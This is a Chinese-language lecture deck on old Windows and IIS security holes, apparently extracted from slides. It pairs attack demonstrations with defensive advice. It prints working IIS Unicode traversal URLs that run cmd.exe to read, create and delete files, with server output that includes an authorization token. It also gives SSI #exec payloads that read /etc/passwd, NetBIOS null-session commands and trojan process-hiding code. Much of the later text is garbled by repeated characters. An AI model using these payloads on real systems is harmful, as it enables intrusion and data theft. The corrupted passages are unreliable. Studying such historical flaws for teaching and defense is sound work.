操作系統(tǒng)安全二

WINDOWS9x/2000/NT系統(tǒng)安全1Windows9x漏洞2Windows文件擴展名欺騙漏洞

漏洞描述：

如果命名一個文件名字："file.html

.exe"其中用ASCII的255來代替其中的空格，那么，在WINDOWS里面將只能看見文件名是：file.html。

并且這個文件名欺騙對IE的下載對話框同樣存在，惡意者可能連接一個可執(zhí)行文件，但是讓人看起來象一個HTML網頁3Windows快捷方式漏洞Windows快捷方式包括擴展名為lnk、pif、url的文件。其中url文件為純文本格式lnk

和pif文件為二進制文件。這三種快捷方式都可以自定義圖標文件，當把圖標文件名設定為

Windows的默認設備名時，由于設備名稱解析漏洞，可導致Windows95/98系統(tǒng)崩潰。由于

對圖標的搜索是由Explorer自動完成的，所以只要快捷方式在資源瀏覽器中出現，就會導

致系統(tǒng)崩潰。如果快捷方式在桌面上，那么系統(tǒng)一啟動就會崩潰。只有以DOS啟動系統(tǒng)，在

命令行下刪除。由于無法直接設置圖標文件名為設備名，只有通過直接編輯的方式來創(chuàng)建。

4Windows快捷方式漏洞對于WindowsNT/2000系統(tǒng)不會由于設備名稱解析而崩潰。但當我們創(chuàng)建一個完全由

ASCII字符填充組成的pif文件時會出現以下情況：

1）一個非法的pif文件（用ascii字符'x'填充）至少要369字節(jié)，系統(tǒng)才認為是一個

合法的pif文件，才會以pif的圖標[pifmgr.dll,0]顯示，在屬性里有程序、

字體、內存、屏幕”等內容。而且僅僅當一個非pif文件的大小是369字節(jié)時察看

屬性的“程序”頁時，不會發(fā)生程序錯誤，哪怕是370字節(jié)也不行。當對一個大于

369字節(jié)的非法pif文件察看屬性的“程序”頁時，Explorer會出錯，提示：

5Windows快捷方式漏洞"0x77650b82"指令引用的"0x000000000"內存。該內存不能為"read"

但這種錯誤并不會引起緩沖溢出的安全問題。初步分析了一下，問題出在pif文件

的16進制地址：

0x00000181[0x87]0x00000182[0x01]和

0x00000231[0xC3]0x00000232[0x02]

即使是一個合法pif文件，只要改動這四處的任意一處，也會引起程序錯誤。而只

要把0x00000181和0x00000182的值改為[0xFF][0xFF]，那么其它地址任意更改

都不會引起錯誤。

6Windows快捷方式漏洞2）當一個大于30857的非法pif文件（用ascii字符'x'填充）出現在資源管理器中時，

會使系統(tǒng)的CPU資源占用達100%，根本不能察看其屬性頁。也無法在資源管理器中

對其進行任何操作，甚至不能在命令提示符中刪除。試圖刪除時會提示會提示：

“進程無法訪問文件，因為另一個程序正在使用此文件?！?/p>

但只要把0x00000181和0x00000182中任意一處改為[0xFF]這種情況就不會發(fā)生。

這是由于資源瀏覽器試圖顯示其實并不存在的圖標引起的。如果快捷方式在桌面

上，那么系統(tǒng)一啟動這種情況就會出現。只有使用任務管理器中止Explorer.exe

的進程，再啟動一個命令提示符，從命令行下刪除。

此問題僅影響WindowsNT/2000系統(tǒng)，不影響Windows95/98。7系統(tǒng)安全漏洞及解決方案NetBIOS的信息泄漏netuse\\server\IPC$""/user:""

//此命令用來建立一個空會話netview\\server

//此命令用來查看遠程服務器的共享資源服務器名稱注釋

\\pc1

\\pc2

命令成功完成。nettime\\server

//此命令用來得到一個遠程服務器的當前時間。

8系統(tǒng)安全漏洞及解決方案nbtstat-Aserver

//此命令用來得到遠程服務器的NetBIOS用戶名字表NetBIOSRemoteMachineNameTable

Name

Type

Status

NULL

<00>UNIQUE

Registered

NULL

<20>UNIQUE

Registered

INTERNET

<00>GROUP

Registered

XIXI

<03>UNIQUE

Registered

INet~Services

<1C>GROUP

Registered

IS~NULL

<00>UNIQUE

Registered

INTERNET

<1E>GROUP

Registered

ADMINISTATOR

<03>UNIQUE

Registered

INTERNET

<1D>UNIQUE

Registered

..__MSBROWSE__.<01>GROUP

RegisteredMACAddress=00-54-4F-34-D8-80

9系統(tǒng)安全漏漏洞及解決決方案修改注冊表表一勞永逸逸HKEY-LOCAL_MACHINE\SYSTEM\CurrentControSet\Control\LSAValueName:RestrictAnonymousDataType:REG_DWORDValue:110MicrosoftIIS導致網網絡泄露11MicrosoftWindows98/2000Folder.htt漏漏洞(2000-8-17)windows98和2000中，一一個名為Folder.htt的文件件決定了文文件夾以何何種方式顯顯示為web頁面。。這個文件件包含活動動的腳本解解釋執(zhí)行。。如果一個個用戶任意意打開了一一個文件夾夾，同時以以web頁頁面形式察察看該文件件夾的選項項為enable的的話（默認認選項），，則Folder.htt文文件中的任任何代碼均均會以該用用戶的特權權等級運行行。通過本本地文件夾夾和遠程UNC共享享都可以利利用此漏洞洞。

問題題出在ShellDefViewActiveX控件件。這個控控件用來確確定對選中中的文件執(zhí)執(zhí)行什么操操作。為了了激活對選選中的文件件的默認操操作，它使使用無任何何參數的InvokeVerb()方法。文文件夾中的的第一個文文件可以通通過FileList.focus()方法法被自動選選中。因此此，如果創(chuàng)創(chuàng)建一個文文件，它默默認的打開開操作為““執(zhí)行”，，而且處于于文件列表表的第一個個位置（默默認的文件件排序方式式是按字母母順序，例例11111111.bat會因此被被排在首位位），則只只要打開該該文件所在在的文件夾夾，就會選選中并運行行該文件。。12UNICODE漏洞洞的原理此漏洞從中中文IIS4.0+SP6開開始，還影影響中文WIN2000+IIS5.0、中文文WIN2000+IIS5.0+SP1，臺臺灣繁體中中文也同樣樣存在這樣樣的漏洞。。

中文文版的WIN2000中，UNICODE編碼碼存在BUG，在在UNICODE編編碼中%c1%1c-〉(0xc1-0xc0)*0x40+0x1c=0x5c=‘‘/‘%c0%2f-〉(0xc0-0xc0)*0x40+0x2f=0x2f=‘‘＼‘NT4中/編碼碼為%c1%9c在在英文文版里：WIN2000英文文版%c0%af但但從國國外某些站站點得來的的資料顯示示，還有以以下的編碼碼可以實現現對該漏洞洞的檢測.

%c1%pc%c0%9v%c0%qf%c1%8s%e0%80%af%f0%80%80%af

%fc%80%80%80%80%af系統(tǒng)安全漏漏洞及解決決方案13系統(tǒng)安全漏漏洞及解決決方案UNICODE編碼碼漏洞簡單單利用的命命令1、顯示文文件內容如果想顯示示里面的其其中一個badboy.txt文本文文件，我們們可以這樣樣輸入（htm,html，，asp,bat等等文件都是是一樣的））http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+type+c:＼＼badboy.txt那那么該文文件的內容容就可以通通過IE顯顯示出來。。2、建立文文件夾的命命令http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+md+c:＼badboy運運行后我們們可以看到到

返回這這樣的結果果：CGIError

ThespecifiedCGIapplicationmisbehavedbynotreturningacompletesetofHTTPheaders.Theheadersitdidreturnare:14系統(tǒng)安全漏漏洞及解決決方案3、刪除空空的文件夾夾命令http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+rd+c:＼badboy返返回信息息同上4、刪除文文件的命令令http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del+c:＼badboy.txt

返回信信息同上5、copy文件且且改名的命命令http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:＼badboy.txtbad.txt

返回回信息：CGIErrorThespecifiedCGIapplicationmisbehavedbynotreturningacomplete

setofHTTPheaders.Theheadersitdidreturnare:1file(s)copied.15系統(tǒng)安全漏漏洞及解決決方案顯示目標主主機當前的的環(huán)境變量量/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+set

返回回的信息：：

CGIErrorThespecifiedCGIapplicationmisbehavedbynotreturningacompletesetofHTTPheaders.Theheadersitdidreturnare:ALLUSERSPROFILE=E:＼DocumentsandSettings＼AllUsersAUTH_TYPE=Negotiate

AUTH_USER=BADBOYCL-DQQZQQ＼＼badboyCASL_BASEDIR_ENV=E:＼＼scan＼CyberCopScanner＼caslCommonProgramFiles=E:＼ProgramFiles＼＼CommonFiles

COMPUTERNAME=BADBOYCL-DQQZQQComSpec=E:＼WINNT＼system32＼cmd.exe16系統(tǒng)安全漏漏洞及解決決方案CONTENT_LENGTH=0GATEWAY_INTERFACE=CGI/1.1HTTP_ACCEPT=*/*HTTP_ACCEPT_LANGUAGE=zh-cnHTTP_CONNECTION=Keep-AliveHTTP_HOST=

HTTP_USER_AGENT=Mozilla/4.0(compatible;MSIE5.01;WindowsNT5.0)HTTP_AUTHORIZATION=NegotiateTlRMTVNTUAADAAAAGAAYAIgAAAAYABgAoAAAAB4AHgBAAAAADAAMAF4AAAAeAB4AagAAAAAAAAC4AAAABYKAgEIAQQBEAEIATwBZAEMATAAtAEQAUQBRAFoAUQBRAGIAYQBkAGIAbwB5AEIAQQBEAEIATwBZAEMATAAtAEQAUQBRAFoAUQBRAODLOAUsBqOAQ3/+AfwqHKj8Q2vzSAGGgkD6hCEY0EoOIKZVHMr4lmc1Ju37n7SleT==HTTP_ACCEPT_ENCODING=gzip,deflateHTTPS=offINSTANCE_I17系統(tǒng)安全漏漏洞及解決決方案18系統(tǒng)安全漏漏洞及解決決方案19越權訪問drwtsn32.exe（（Dr.Watson）是是一個Windows系統(tǒng)內內置的程序序錯誤調試試器。默認認

狀態(tài)下下，出現程程序錯誤時時，Dr.Watson將將自動啟啟動，除非非系統(tǒng)上安安裝了VC等其他具具有調試功功能的軟件件更改了默默認值。注注冊表項：：

[HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\AeDebug]下下的Debugger項的的值指定了了調試器及及使用的命命令；Auto項項決定是否否自動診斷斷錯誤，并并記錄相應應的診斷信信息。[HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\AeDebug]20越權訪問在Windows2000中drwtsn32.exe默認會會將故障轉轉儲文件user.dmp存存放在目錄錄“\DocumentsandSettings\AllUsers\Documents\DrWatson”下。。權限為Everyone完完全控制。。在WindowsNT中中被存儲在在“\WINNT\”中，everyone組組至少有讀讀取權限。。

由于user.dmp中中存儲的內內容是當前前用戶的部部分內存鏡鏡像，所以以可能導致致各種敏感感信息泄漏漏，例如帳帳號、口令令、郵件、、瀏覽過的的網頁、正正在編輯的的文件等等等，具體取取決于崩潰潰的應用程程序和在此此之前用戶戶進行了那那些操作。。21越權訪問drwtsn32參參數drwtsn32[-i][-g][-ppid][-eevent][-?]-i將將DrWtsn32當當作默認認應用程程序錯誤誤調試程程序-g被被忽略，，但作為為WINDBG和和NTSD的的兼容容而被提提供-ppid要要調試試的進程程id

-eevent表示示進程附附加完成成的事件件

-?這個個屏幕22木馬程序序原理木馬的分分類木馬程序序技術發(fā)發(fā)展至今今，已經經經歷了了4代，，第一代代，即是是簡單的的密碼竊竊取，發(fā)發(fā)送等，，沒有什什么特別別之處。。第二代代木馬，，在技術術上有了了很大的的進步，，冰河可可以說為為是國內內木馬的的典型代代表之一一。第三三代木馬馬在數據據傳遞技技術上，，又做了了不小的的改進，，出現了了ICMP等類類型的木木馬，利利用畸形形報文傳傳遞數據據，增加加了查殺殺的難度度。第四四代木馬馬在進程程隱藏方方面，做做了大的的改動，，采用了了內核插插入式的的嵌入方方式，利利用遠程程插入線線程技術術，嵌入入DLL線程。。或者掛掛接PSAPI,實現現木馬程程序的隱隱藏，甚甚至在WindowsNT/2000下下，都達達到了良良好的隱隱藏效果果。相信信，第五五代木馬馬很快也也會被編編制出來來。。23木馬程序序原理木馬程序序的隱藏藏技術進程：一個正正常的Windows應用程程序，在在運行之之后，都都會在系系統(tǒng)之中中產生一一個進程程，同時時，每個個進程，，分別對對應了一一個不同同的PID（ProgressID,進進程標標識符））這個進進程會被被系統(tǒng)分分配一個個虛擬的的內存空空間地址址段，一一切相關關的程序序操作，，都會在在這個虛虛擬的空空間中進進行。線程：一個進進程，可可以存在在一個或或多個線線程，線線程之間間同步執(zhí)執(zhí)行多種種操作，，一般地地，線程程之間是是相互獨獨立的，，當一個個線程發(fā)發(fā)生錯誤誤的時候候，并不不一定會會導致整整個進程程的崩潰潰。服務：一個進進程當以以服務的的方式工工作的時時候，它它將會在在后臺工工作，不不會出現現在任務務列表中中，但是是，在WindowsNT/2000下下，你仍仍然可以以通過服服務管理理器檢查查任何的的服務程程序是否否被啟動動運行。。24木馬程序序原理WINAPIWinMain(HINSTANCE,HINSTANCE,LPSTR,int){try{DWORDdwVersion=GetVersion();//取得Windows的版本本號if(dwVersion>=0x80000000)//Windows9x隱藏任任務列表表{int(CALLBACK*rsp)(DWORD,DWORD);HINSTANCEdll=LoadLibrary("KERNEL32.DLL");//裝入KERNEL32.DLLrsp=(int(CALLBACK*)(DWORD,DWORD))GetProcAddress(dll,"RegisterServiceProcess");//找到RegisterServiceProcess的入口口rsp(NULL,1);//注冊服服務FreeLibrary(dll);//釋放DLL模模塊}}catch(Exception&exception)//處理異異常事件件{//處理理異常事事件}return0;}25木馬程序序原理程序的自自加載運運行技術術1、集成成到程序序中6、在在System.ini中藏藏身2、隱藏藏在配置置文件中中7、隱形形于啟動動組中3、潛伏伏在Win.ini中中8、隱蔽蔽在Winstart.bat中4、偽裝裝在普通通文件中中9、、捆綁在在啟動文文件中5、內置置到注冊冊表中10、設設置在超超級連接接中26木馬程序序原理木馬程序序的建立立連接的的隱藏合并端口口法，也也就是說說，使用用特殊的的手段，，在一個個端口上上同時綁綁定兩個個TCP或者UDP連連接，這這聽起來來不可思思議，但但事實上上確實如如此，而而且已經經出現了了使用類類似方法法的程序序，通過過把自己己的木馬馬端口綁綁定于特特定的服服務端口口之上，，（比如如80端端口的HTTP，誰懷懷疑他會會是木馬馬程序呢呢？）從從而達到到隱藏端端口的目目地。另另外一種種辦法，，是使用用ICMP（InternetControlMessageProtocol））協(xié)議進進行數據據的發(fā)送送,原理理是修改改ICMP頭的的構造，，加入木木馬的控控制字段段，這樣樣的木馬馬，具備備很多新新的特點點，不占占用端口口的特點點，使用用戶難以以發(fā)覺，，同時，，使用ICMP可以穿穿透一些些防火墻墻，從而而增加了了防范的的難度。。之所以以具有這這種特點點，是因因為ICMP不不同于TCP，，UDP，ICMP工工作于網網絡的應應用層不不使用TCP協(xié)協(xié)議。27木馬程序序原理木馬程序序的建立立連接的的隱藏28木馬程序序原理29瀏覽網頁頁也會中中木馬1.MIME簡簡介MIME(MultipurposeInternetMailExtentions)，一般般譯作““多用途途的網際際郵件擴擴充協(xié)議議”。顧顧名思義義，它可可以傳送送多媒體體文件，，在一封封電子郵郵件中附附加各種種格式文文件一起起送出?！，F在它它已經演演化成一一種指定定文件類類型(Internet的任任何形式式的消息息：e-mail，usenet新新聞和Web)的通用用方法。。在使用用CGI程序時時你可能能接觸過過MIME類型型，其中中有一行行叫作Content-type的的語句，，它用來來指明傳傳遞的就就是MIME類類型的文文件(如如text/html或text/plain)。30瀏覽網頁頁也會中中木馬IE是如如何處理理附件的的：一般般情況下下如果附附件是文文本文件件，IE會讀它它，如果果是VIDEOCLIP，，IE會會查看它它；如果果附件是是圖形文文件，IE就會會顯示它它；如果果附件是是一個EXE文文件呢？？IE會會提示用用戶是否否執(zhí)行?。〉钊巳丝謶值牡氖?，當當攻擊者者更改MIME類型后后，IE就不再再提示用用戶是否否執(zhí)行而而直接運運行該附附件！從從而使攻攻擊者加加在附件件中的程程序、攻攻擊命令令能夠按按照攻擊擊者設想想的情況況進行。。31OICQ的安全全縱觀針對對OICQ的攻攻擊，主主要分為為IP探探測、消消息炸彈彈、密碼碼和本地地消息破破解、木木馬植入入及其它它方式。。推出該該安全手手冊的目目的是為為了能讓讓大多數數對網絡絡安全不不熟悉的的網民們們能夠簡簡單的防防御這些些攻擊。。32OICQ的安全全IP探測測由于OICQ采采用的是是UDP數據包包通訊，，攻擊者者只要向向你發(fā)送送一個信信息，他他就可以以通過監(jiān)監(jiān)視UDP數據據包來獲獲得你的的IP和和OICQ的端端口號，，從理論論上說，，在直接接通訊的的模式下下，想避避免攻擊擊者發(fā)現現你的IP地址址是十分分困難。。

IP探測的的另一個個方法是是通過端端口掃描描，OICQ的的通訊端端口值默默認情況況下是8000，攻擊擊者可以以通過集集中掃描描某一地地址段的的8000端口口來獲得得那些正正在使用用OICQ的IP地址址。33OICQ的安安全防范IP探測測的主要方法法是：一、阻阻止攻擊者與與你直接通訊訊，在OICQ的個人設設定里修改身身份驗證默認認值為"需要要身份認證才才能把我加為為好友"，這這樣攻擊者也也還是可以通通過某些特殊殊的信息發(fā)送送軟件跟你通通訊，所以你你還應該在系系統(tǒng)參數設置置里把拒絕陌陌生人消息的的選項選上。。另一種阻止止攻擊者與你你直接通訊的的方法是通過過代理上OICQ或者隱隱身登陸，這這樣攻擊者所所看到的IP地址是代理理服務巧刪OICQ登錄錄號碼器的IP，隱身登登陸的消息傳傳遞是通過服服務器中轉，，這樣傳給攻攻擊者的數據據包的IP地地址是騰訊服服務器的地址址。

修改OICQ通訊訊端口默認值值是避免被攻攻擊者掃描的的唯一方法，，它還能防止止攻擊者給你你發(fā)送垃圾消消息。34OICQ的安安全消息炸彈消息炸彈攻擊擊原理是利用用UDP數據據通訊不需要要驗證確認的的弱點，只要要拿到用戶的的IP地址和和OICQ通通訊端口即可可發(fā)動攻擊。。35OICQ的安安全密碼和本地消消息破解通過暴力解密密是一種破解解手段，有些些攻擊者還采采用一些鍵盤盤記錄程式來來記錄你輸入入的帳號和密密碼，讓你防防不勝防。另另一種獲得OICQ密碼碼的手段是通通過攻擊你的的注冊郵箱，，由于騰訊有有一個忘記密密碼功能，它它將用戶的OICQ密碼碼發(fā)送到用戶戶注冊時的郵郵箱里，攻擊擊者一旦拿到到這個郵箱，，即可以很簡簡單的拿到你你的密碼。36OICQ的安安全一、本地破解解防范破解密碼通常常是窮舉。不不要用簡單的的英文和純數數字作為密碼碼，應該是大大小寫、數字字、符號的混混合，不要少少于八位，這這樣的話密碼碼就不容易被被破了二、攻擊注冊冊郵箱防范個人資料里和和你申請?zhí)柎a碼時所填的mail地址址不要一樣，，除非你對你你的密碼很有有信心。選擇擇一個好密碼碼也是一個好好辦法！37OICQ木馬馬程序剖析GOP木木馬程序GOP木馬的的檢查該木馬運行的的時候在Windows的任務窗口口中是看不到到的,你可以以點任務條上上的“開始””、“運行””、“msinfo32”(就是Windows自帶的系系統(tǒng)信息，在在“附件”中中)?？雌渲兄械能浖h(huán)境境→正在運行行的任務。這這才是Windows現現在全部運行行的任務。當當你在運行了了什么東西之之后覺得有問問題的時候就就看看這里。。如果有一個個項目有程序序名和路徑，，而沒有版本本、廠商和說說明，你就應應該緊張一下下了。GOP木馬在這里里顯示的版本本為：“不能能用”。如果果你發(fā)現GOP木馬，先先關掉你的貓貓(斷網)，，然后脫機重重新登錄一次次你的OICQ，查找電電腦中是否有有record.dat文件(每個個盤都應該查查一下！絕不不放過！)(這是GOP記錄OICQ密碼的文文檔，如果你你的OICQ密碼被監(jiān)控控到了就一定定會有。當然然，即使你中中了木馬，在在你還沒有用用OICQ的的時候是不會會有這個文件件的。反正現現在不在網上上，不用擔心心密碼被發(fā)走走)。如果有有的話，那么么“恭喜”你你了，100%中了木馬馬。不信？用用記事本打開開那個record.dat，看看看有沒有你的的寶貝OICQ的號碼和和密碼。你你還可以運運行系統(tǒng)配置置實用程序(開始―運行行―msconfig)，在啟動欄欄里，你亦可可發(fā)現“WindowsAgent”(就是上上文提到的““定義注冊表表鍵名”,可可能會是其它它鍵名)38OICQ木馬馬程序GOP木馬的的清除在注冊冊表的的HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run主鍵鍵下添添加一一個鍵鍵值來來讓木木馬自自動運運行，，該木木馬也也不例例外。。運行行regedit，，進入入HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run主鍵鍵，記記住那那個在在系統(tǒng)統(tǒng)信息息中查查到的的那個個文件件，也也可在在msconfig―啟啟動――名稱稱里找找到(在““剖析析木馬馬的設設置””中，，我們們知道道木馬馬文件件名是是可以以任意意定制制的，，所以以無法法確定定具體體的文文件名名)的的存放放路徑徑，刪刪除該該鍵值值。然然后關關閉計計算機機，稍稍候一一下啟啟動計計算機機(注注意：：不要要選重重新啟啟動)。然然后進進入文文件的的存放放路徑徑刪除除木馬馬文件件即可可。39惡意程程序郵件炸炸彈原原理E-MAIL炸炸彈原原本泛泛指一一切破破壞電電子郵郵箱的的辦法法，一一般的的電子子郵箱箱的容容量在在5，，6M以下下，平平時大大家收收發(fā)郵郵件，，傳送送軟件件都會會覺得得容量量不夠夠，如如果電電子郵郵箱一一下子子被幾幾百，，幾千千甚至至上萬萬封電電子郵郵件所所占據據，這這是電電子郵郵件的的總容容量就就會超超過電電子郵郵箱的的總容容量，，以至至造成成郵箱箱超負負荷而而崩潰潰。【kaboom3】】【upyours4】】【Avalanchev2.8】】40惡意程程序郵件炸炸彈防防范⒈不要要將自自己的的郵箱箱地址址到處處傳播播，特特別是是申請請上網網帳號號時ISP送的的電子子信箱箱，那那可是是要按按字節(jié)節(jié)收費費的喲喲！去去申請請幾個個免費費信箱箱對外外使用用，隨隨便別別人怎怎么炸炸，大大不了了不要要了。。⒉最好好用POP3收收信，，你可可以用用Outlook或或Foxmail等POP收信信工具具收取取Email。。例如如用Outlook，你你可以以選擇擇“工工具””/““收件件箱助助理””，然然后點點擊““添加加”在在屬性性窗口口可以以設定定對各各種條條件的的Email的的處理理方式式。41惡意程程序郵件炸炸彈防防范⒊當某某人不不停炸炸你信信箱時時，你你可以以先打打開一一封信信，看看清對對方地地址，，然后后在收收件工工具的的過濾濾器中中選擇擇不再再接收收這地地址的的信，，直接接從服服務器器刪除除。4。在在收信信時，，一旦旦看見見郵件件列表表的數數量超超過平平時正正常郵郵件的的數量量的若若干倍倍，應應當馬馬上停停止下下載郵郵件，，然后后再從從服務務器刪刪除炸炸彈郵郵件。。⒌不要要認為為郵件件發(fā)送送有個個回復復功能能，就就可以以將發(fā)發(fā)炸彈彈的人人報復復回來來，那那是十十分愚愚蠢的的！發(fā)發(fā)件人人有可可能是是用的的假地地址發(fā)發(fā)信，，這個個地址址也許許填得得與收收件人人地址址相同同。這這樣你你不但但不能能回報報對方方，還還會使使自己己的郵郵箱徹徹底完完結?。?2惡意程程序郵件炸炸彈防防范⒍你還還可以以用一一些工工具軟軟件防防止郵郵件炸炸彈，，下面面本站站就提提供一一個供供大家家下載載：【【echom201】】這是是一個個功能能強大大的砍砍信機機，每每分鐘鐘能砍砍到1000封封電子子郵件件，是是對付付郵件件炸彈彈的好好東西西43惡意程程序端口攻攻擊原原理這類軟軟件是是利用用Window95/NT系系統(tǒng)本本身的的漏洞洞，這這與Windows下微微軟網網絡協(xié)協(xié)議NetBIOS的一一個例例外處處理程程序OOB（OutofBand）有有關。。只要要對方方以OOB的方方式，，就可可以通通過TCP/IP傳傳遞一一個小小小的的封包包到某某個IP地地址的的Port139上上，該該地址址的電電腦系系統(tǒng)即即（WINDOWS95/NT））就會會“應封包包而死死”，自動動重新新開機機，你你未存存檔的的所有有工作作就得得重新新再做做一遍遍了。。44惡意程程序端口攻攻擊防防范常見的的端口口攻擊擊器有有【uKe23】【【voob】【【WINNUKE2】。。如果果你還還是用用的win95，那那您就就要當當心了了。防防范范將將你你的Windows95馬上上升級級到Windows98，首首先修修正Win95的BUG，在在微軟軟主頁頁的附附件中中有對對于Win95和OSR2以以前的的版本本的補補丁程程序，，Win98不不需要要。然然后學學會隱隱藏自自己的的IP，包包括將將ICQ中中"IP隱隱藏"打開開，注注意避避免在在會顯顯示IP的的BBS和和聊天天室上上暴露露真實實身份份，特特別在在去黑黑客站站點訪訪問時時最好好先運運行隱隱藏IP的的程序序。45惡意程程序JAVA炸炸彈彈原理理很多人人在聊聊天室室中被被炸了了以后后，就就以為為是被被別人人黑了了，其其實不不是的的。炸炸彈有有很多多種，，有的的是造造成電電腦直直接死死機，，有的的是通通過HTML語語言，，讓你你的瀏瀏覽器器吃完完你的的系統(tǒng)統(tǒng)資源源，然然后你你就死死機了了。46惡意程程序JAVA炸炸彈彈防范范唯一的的防范范方法法就是是你在在聊天天室聊聊天時時，特特別是是支持持HTML的聊聊天室室（比比如湛湛江，，新疆疆等））請你你一定定記住住關掉掉你瀏瀏覽器器里的的java功能能，還還要記記住不不要瀏瀏覽一一些來來路不不明的的網站站和不不要在在聊天天室里里按其其他網網友發(fā)發(fā)出的的超級級鏈接接，這這樣可可以避避免遭遭到惡惡作劇劇者的的攻擊擊.47惡意程程序瀏覽主主頁硬硬盤共共享“萬花花谷””，如如果進進入該該網頁頁瀏覽覽者注注冊表表會被被修改改，好好多系系統(tǒng)功功能因因此受受到限限制。。最近近又聽聽說有有網友友在瀏瀏覽網網頁時時硬盤盤被共共享，，危害害似乎乎更大大！其實，，所謂謂的瀏瀏覽網網頁硬硬盤被被共享享，和和“萬萬花谷谷”一一樣，，受害害者都都是在在瀏覽覽了含含有有有害代代碼的的ActiveX網網頁文文件后后中招招的。。48惡意程程序瀏覽主主頁硬硬盤共共享防御防防范：：1、不不要輕輕易去去一些些自己己并不不了解解的站站點，，特別別是那那些看看上去去美麗麗誘人人的網網址更更不要要貿然然前往往，否否則吃吃虧的的往往往是你你。2、、運行行IE，點點擊““工具具→Internet選選項→→安全全→Internet區(qū)區(qū)域的的安全全級別別，把把安全全極別別由““中””改為為“高高”3、、由于于該類類網頁頁是含含有有有害代代碼的的ActiveX網網頁文文件，，因此此在IE設設置中中將ActiveX插件件和控控件、、Java腳本本等全全部禁禁止就就可以以避免免中招招。具具體方方法是是：在在IE窗口口中點點擊““工具具→Internet選選項，，在彈彈出的的對話話框中中選擇擇“安安全””標簽簽，再再點擊擊“自自定義義級別別”按按鈕，，就會會彈出出“安安全設設置””對話話框，，把其其中所所有ActiveX插件件和控控件以以及Java相相關全全部選選擇““禁用用”即即可。。不過過，這這樣做做在以以后的的網頁頁瀏覽覽過程程中可可能會會造成成一些些正常常使用用ActiveX的的網站站無法法瀏覽覽。唉唉，有有利就就有弊弊，你你還是是自己己看著著辦吧吧。4、、對于于Windows98用用戶，，請打打開C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP，把把其中中的““ActiveXComponent.class”刪刪掉；；對于于WindowsMe用用戶，，請打打開C:\WINDOWS\JAVA\Packages\5NZVFPF1.ZIP，把把其中中的““ActiveXComponent.class”刪刪掉。。請放放心，，刪除除這個個組件件不會會影響響到你你正常常瀏覽覽網頁頁的。。49惡意程程序5、既既然這這類網網頁是是通過過修改改注冊冊表來來破壞壞我們們的系系統(tǒng)，，那么么我們們可以以事先先把注注冊表表加鎖鎖：禁禁止修修改注注冊表表，這這樣就就可以以達到到預防防的目目的。。不過過，自自己要要使用用注冊冊表編編輯器器regedit.exe該該怎么么辦呢呢？因因此我我們還還要在在此前前事先先準備備一把把“鑰鑰匙””，以以便打打開這這把““鎖””！加鎖方方法如如下：：(1)運行行注冊冊表編編輯器器regedit.exe；；(2)展開開注冊冊表到到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下下，新新建一一個名名為DisableRegistryTools的的DWORD值值，并并將其其值改改為““1””，即即可禁禁止使使用注注冊表表編輯輯器regedit.exe。解鎖鎖方方法法如如下下：：用用記記事事本本編編輯輯一一個個任任意意名名字字的的.reg文文件件，，比比如如unlock.reg，，內內容容如如下下：：REGEDIT4[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]"DisableRegistryTools"=dword:0000000050惡意意程程序序51惡意意程程序序網頁頁執(zhí)執(zhí)行行exe文文件件在服服務務器器端端執(zhí)執(zhí)行行文文件件是是靠靠SSI來來實實現現的的，，SSI是是服服務務器器端端包包含含的的意意思思（（不不是是SSL）），，我我們們經經常常使使用用的的#include就就是是服服務務器器端端包包含含的的指指令令之之一一。。不不過過，，這這次次要要介介紹紹的的就就是是#exec。。就就是是他他可可以以實實現現服服務務器器端端執(zhí)執(zhí)行行指指令令。。不不過過，，不不能能用用于于.asp的的文文件件。。而而只只能能stm、、.shtm和和.shtml這這些些擴擴展展名名。。而而能能解解釋釋執(zhí)執(zhí)行行他他們們的的就就是是Ssinc.dll。。所所以以，，你你寫寫好好的的代代碼碼必必須須保保存存成成.stm等等格格式式才才能能確確保保服服務務器器能能執(zhí)執(zhí)行行。。52惡意意程程序序網頁頁執(zhí)執(zhí)行行exe文文件件SSI有有什什么么用用?目目前前，，主主要要有有以以下下幾幾種種用用用用途途：：1、、顯顯示示服服務務器器端端環(huán)環(huán)境境變變量量<#echo>2、、將將文文本本內內容容直直接接插插入入到到文文檔檔中中<#include>3、、顯顯示示WEB文文檔檔相相關關信信息息<#flastmod#fsize>(如如文文件件制制作作日日期期/大大小小等等)4、、直直接接執(zhí)執(zhí)行行服服務務器器上上的的各各種種程程序序<#exec>(如如CGI或或其其他他可可執(zhí)執(zhí)行行程程序序)5、、設設置置SSI信信息息顯顯示示格格式式<#config>(如如文文件件制制作作日日期期/大大小小顯顯示示方方式式)高高級級SSI<XSSI>可可設設置置變變量量使使用用if條條件件語語句句。。53惡意意程程序序<!--#execcmd=””cat/etc/passwd”-->將將會會顯顯示示密密碼碼文文件件<!--#execcmd=””dir/b”-->將將會會顯顯示示當當前前目目錄錄下下文文件件列列表表<!--#execcgi=””/cgi-bin/gb.cgi”-->將將會會執(zhí)執(zhí)行行CGI程程序序gb.cgi。<!--#execcgi=””/cgi-bin/access_log.cgi”-->將將會會執(zhí)執(zhí)行行CGI程程序序access_log.cgi54惡意意程程序序防范范方方法法access.conf中的的””O(jiān)ptionsIncludesExecCGI”這這行行代代碼碼刪刪除除；；在IIS中中，，要要禁禁用用#exec命令令，，可可修修改改SSIExecDisable元數數據據庫庫；；55Windows注注冊冊表表注冊冊表表的的介介紹紹注冊冊表表的的修修改改56注冊冊表表的的基基本本概概念念所謂謂注注冊冊表表就就是是一一個個龐龐大大的的數數據據庫庫，，其其中中容容納納了了應應用用程程序序和和計計算算機機系系統(tǒng)統(tǒng)的的全全部部配配置置信信息息，，Windows9x系系統(tǒng)統(tǒng)和和應應用用程程序序的的初初始始化化信信息息，，應應用用程程序序和和文文